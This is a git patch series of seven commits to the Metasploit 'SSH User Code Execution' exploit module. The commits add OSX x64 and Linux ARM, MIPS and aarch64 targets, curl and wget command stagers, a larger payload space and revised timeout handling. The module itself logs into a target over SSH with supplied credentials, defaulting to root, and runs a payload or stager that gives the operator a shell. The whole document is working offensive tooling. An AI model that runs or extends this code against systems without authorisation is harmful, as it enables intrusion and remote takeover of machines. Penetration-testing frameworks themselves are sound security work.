From 3b2a0be20043267f66e386dcc7e02330e2cbeb6f Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Thu, 30 Nov 2017 14:42:14 -0600 Subject: [PATCH 1/7] First swing at osx x64 meterpreter support --- modules/exploits/multi/ssh/sshexec.rb | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index 5c4fb8149cbe..a160c91252a3 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -35,11 +35,12 @@ def initialize }, 'Payload' => { - 'Space' => 4096, + 'Space' => 800000, 'BadChars' => "", 'DisableNops' => true }, 'Platform' => %w{ linux osx python }, + 'CmdStagerFlavor' => %w{ bourne echo printf curl wget }, 'Targets' => [ [ 'Linux x86', @@ -60,6 +61,13 @@ def initialize 'Platform' => 'osx' } ], + [ 'OSX x64', + { + 'Arch' => ARCH_X64, + 'Platform' => 'osx', + 'CmdStagerFlavor' => %w{curl wget} + } + ], [ 'Python', { 'Arch' => ARCH_PYTHON, @@ -67,7 +75,6 @@ def initialize } ] ], - 'CmdStagerFlavor' => %w{ bourne echo printf }, 'DefaultTarget' => 0, # For the CVE 'DisclosureDate' => 'Jan 01 1999' @@ -77,7 +84,7 @@ def initialize [ OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]), OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]), - OptString.new('RHOST', [ true, "The target address" ]), + Opt::RHOST('RHOST', [ true, "The target address" ]), Opt::RPORT(22) ], self.class ) From e3dc17dd9288c13c9473ce9c77aeb4e71044834e Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Thu, 30 Nov 2017 16:16:34 -0600 Subject: [PATCH 2/7] Add some extra targets --- modules/exploits/multi/ssh/sshexec.rb | 35 ++++++++++++++++++++++++--- 1 file changed, 31 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index a160c91252a3..15e2767eea9e 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -40,7 +40,7 @@ def initialize 'DisableNops' => true }, 'Platform' => %w{ linux osx python }, - 'CmdStagerFlavor' => %w{ bourne echo printf curl wget }, + 'CmdStagerFlavor' => %w{ bourne echo printf wget }, 'Targets' => [ [ 'Linux x86', @@ -55,11 +55,38 @@ def initialize 'Platform' => 'linux' } ], + [ 'Linux armle', + { + 'Arch' => ARCH_ARMLE, + 'Platform' => 'linux' + } + ], + [ 'Linux mipsle', + { + 'Arch' => ARCH_MIPSLE, + 'Platform' => 'linux', + 'CmdStagerFlavor' => %w{curl wget} + } + ], + [ 'Linux mipsbe', + { + 'Arch' => ARCH_MIPSBE, + 'Platform' => 'linux', + 'CmdStagerFlavor' => %w{ wget } + } + ], + [ 'Linux aarch64', + { + 'Arch' => ARCH_AARCH64, + 'Platform' => 'linux' + } + ], [ 'OSX x86', { 'Arch' => ARCH_X86, - 'Platform' => 'osx' - } + 'Platform' => 'osx', + 'CmdStagerFlavor' => %w{curl wget} + } ], [ 'OSX x64', { @@ -139,8 +166,8 @@ def do_login(ip, user, pass, port) end def exploit + execute_command('uname -a') do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT']) - print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...") if target['Platform'] == 'python' execute_command("python -c \"#{payload.encoded}\"") From 6752770695c0aed968e97031fcd2347dc8800e5a Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Thu, 30 Nov 2017 20:45:11 -0600 Subject: [PATCH 3/7] Shut up rubocop --- modules/exploits/multi/ssh/sshexec.rb | 79 +++++++++++++++------------ 1 file changed, 44 insertions(+), 35 deletions(-) diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index 15e2767eea9e..da8715e16070 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -16,11 +16,11 @@ class MetasploitModule < Msf::Exploit::Remote def initialize super( 'Name' => 'SSH User Code Execution', - 'Description' => %q{ + 'Description' => %q( This module connects to the target system and executes the necessary commands to run the specified payload via SSH. If a native payload is specified, an appropriate stager will be used. - }, + ), 'Author' => ['Spencer McIntyre', 'Brandon Knight'], 'References' => [ @@ -39,63 +39,72 @@ def initialize 'BadChars' => "", 'DisableNops' => true }, - 'Platform' => %w{ linux osx python }, - 'CmdStagerFlavor' => %w{ bourne echo printf wget }, + 'Platform' => %w[linux osx python], + 'CmdStagerFlavor' => %w[bourne echo printf wget], 'Targets' => [ - [ 'Linux x86', + [ + 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], - [ 'Linux x64', + [ + 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ], - [ 'Linux armle', + [ + 'Linux armle', { 'Arch' => ARCH_ARMLE, 'Platform' => 'linux' } ], - [ 'Linux mipsle', + [ + 'Linux mipsle', { - 'Arch' => ARCH_MIPSLE, - 'Platform' => 'linux', - 'CmdStagerFlavor' => %w{curl wget} + 'Arch' => ARCH_MIPSLE, + 'Platform' => 'linux', + 'CmdStagerFlavor' => %w[curl wget] } ], - [ 'Linux mipsbe', + [ + 'Linux mipsbe', { - 'Arch' => ARCH_MIPSBE, - 'Platform' => 'linux', - 'CmdStagerFlavor' => %w{ wget } + 'Arch' => ARCH_MIPSBE, + 'Platform' => 'linux', + 'CmdStagerFlavor' => %w[wget] } ], - [ 'Linux aarch64', + [ + 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ], - [ 'OSX x86', + [ + 'OSX x86', { - 'Arch' => ARCH_X86, - 'Platform' => 'osx', - 'CmdStagerFlavor' => %w{curl wget} - } + 'Arch' => ARCH_X86, + 'Platform' => 'osx', + 'CmdStagerFlavor' => %w[curl wget] + } ], - [ 'OSX x64', + [ + 'OSX x64', { - 'Arch' => ARCH_X64, - 'Platform' => 'osx', - 'CmdStagerFlavor' => %w{curl wget} + 'Arch' => ARCH_X64, + 'Platform' => 'osx', + 'CmdStagerFlavor' => %w[curl wget] } ], - [ 'Python', + [ + 'Python', { 'Arch' => ARCH_PYTHON, 'Platform' => 'python' @@ -136,16 +145,16 @@ def execute_command(cmd, opts = {}) def do_login(ip, user, pass, port) factory = ssh_socket_factory opt_hash = { - :auth_methods => ['password', 'keyboard-interactive'], - :port => port, - :use_agent => false, - :config => false, - :password => pass, - :proxy => factory, - :non_interactive => true + auth_methods: ['password', 'keyboard-interactive'], + port: port, + use_agent: false, + config: false, + password: pass, + proxy: factory, + non_interactive: true } - opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opt_hash[:verbose] = :debug if datastore['SSH_DEBUG'] begin self.ssh_socket = Net::SSH.start(ip, user, opt_hash) @@ -172,7 +181,7 @@ def exploit if target['Platform'] == 'python' execute_command("python -c \"#{payload.encoded}\"") else - execute_cmdstager({:linemax => 500}) + execute_cmdstager(linemax: 500) end self.ssh_socket.close From d1d8e3a678e7981bfc3733259878d2aea65b0e2e Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Fri, 1 Dec 2017 10:58:18 -0600 Subject: [PATCH 4/7] Let's not rescue everything..... --- modules/exploits/multi/ssh/sshexec.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index da8715e16070..cc4601d19e94 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -135,10 +135,12 @@ def initialize def execute_command(cmd, opts = {}) vprint_status("Executing #{cmd}") begin - Timeout.timeout(3) do + Timeout.timeout(5) do self.ssh_socket.exec!("#{cmd}\n") end - rescue ::Exception + rescue Timeout::Error + print_error("SSH Timeout Exception will say the Exploit Failed; do not believe it.") + print_good("You will likely still get a shell; run sessions -l to be sure.") end end @@ -175,7 +177,6 @@ def do_login(ip, user, pass, port) end def exploit - execute_command('uname -a') do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT']) print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...") if target['Platform'] == 'python' From 4ca595eb1569e1007e48a7296feb93972c1dfb99 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Tue, 5 Dec 2017 11:55:17 -0600 Subject: [PATCH 5/7] wvu-suggested fix --- modules/exploits/multi/ssh/sshexec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index cc4601d19e94..ab9bb533caa0 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -120,7 +120,7 @@ def initialize [ OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]), OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]), - Opt::RHOST('RHOST', [ true, "The target address" ]), + Opt::RHOST(), Opt::RPORT(22) ], self.class ) @@ -156,7 +156,7 @@ def do_login(ip, user, pass, port) non_interactive: true } - opt_hash[:verbose] = :debug if datastore['SSH_DEBUG'] + opt_hash[:verbose] = :debug if (datastore['SSH_DEBUG']) begin self.ssh_socket = Net::SSH.start(ip, user, opt_hash) From f439edfa1a1cd24246c79fa382df6e5072a53612 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Wed, 17 Jan 2018 08:18:26 -0600 Subject: [PATCH 6/7] Fixes by the fabled wvu --- modules/exploits/multi/ssh/sshexec.rb | 14 ++++---------- 1 file changed, 4 insertions(+), 10 deletions(-) diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index ab9bb533caa0..ccb8a6433fbb 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -134,14 +134,7 @@ def initialize def execute_command(cmd, opts = {}) vprint_status("Executing #{cmd}") - begin - Timeout.timeout(5) do - self.ssh_socket.exec!("#{cmd}\n") - end - rescue Timeout::Error - print_error("SSH Timeout Exception will say the Exploit Failed; do not believe it.") - print_good("You will likely still get a shell; run sessions -l to be sure.") - end + self.ssh_socket.exec!("#{cmd}\n") end def do_login(ip, user, pass, port) @@ -155,8 +148,9 @@ def do_login(ip, user, pass, port) proxy: factory, non_interactive: true } - - opt_hash[:verbose] = :debug if (datastore['SSH_DEBUG']) + if (datastore['SSH_DEBUG']) + opt_hash[:verbose] = :debug + end begin self.ssh_socket = Net::SSH.start(ip, user, opt_hash) From 4c11eae7742f9ae81a2ca27344ec46fc1ca046fc Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Wed, 17 Jan 2018 13:21:36 -0600 Subject: [PATCH 7/7] Maybe that timeout is needed..... --- modules/exploits/multi/ssh/sshexec.rb | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index ccb8a6433fbb..ab9bb533caa0 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -134,7 +134,14 @@ def initialize def execute_command(cmd, opts = {}) vprint_status("Executing #{cmd}") - self.ssh_socket.exec!("#{cmd}\n") + begin + Timeout.timeout(5) do + self.ssh_socket.exec!("#{cmd}\n") + end + rescue Timeout::Error + print_error("SSH Timeout Exception will say the Exploit Failed; do not believe it.") + print_good("You will likely still get a shell; run sessions -l to be sure.") + end end def do_login(ip, user, pass, port) @@ -148,9 +155,8 @@ def do_login(ip, user, pass, port) proxy: factory, non_interactive: true } - if (datastore['SSH_DEBUG']) - opt_hash[:verbose] = :debug - end + + opt_hash[:verbose] = :debug if (datastore['SSH_DEBUG']) begin self.ssh_socket = Net::SSH.start(ip, user, opt_hash)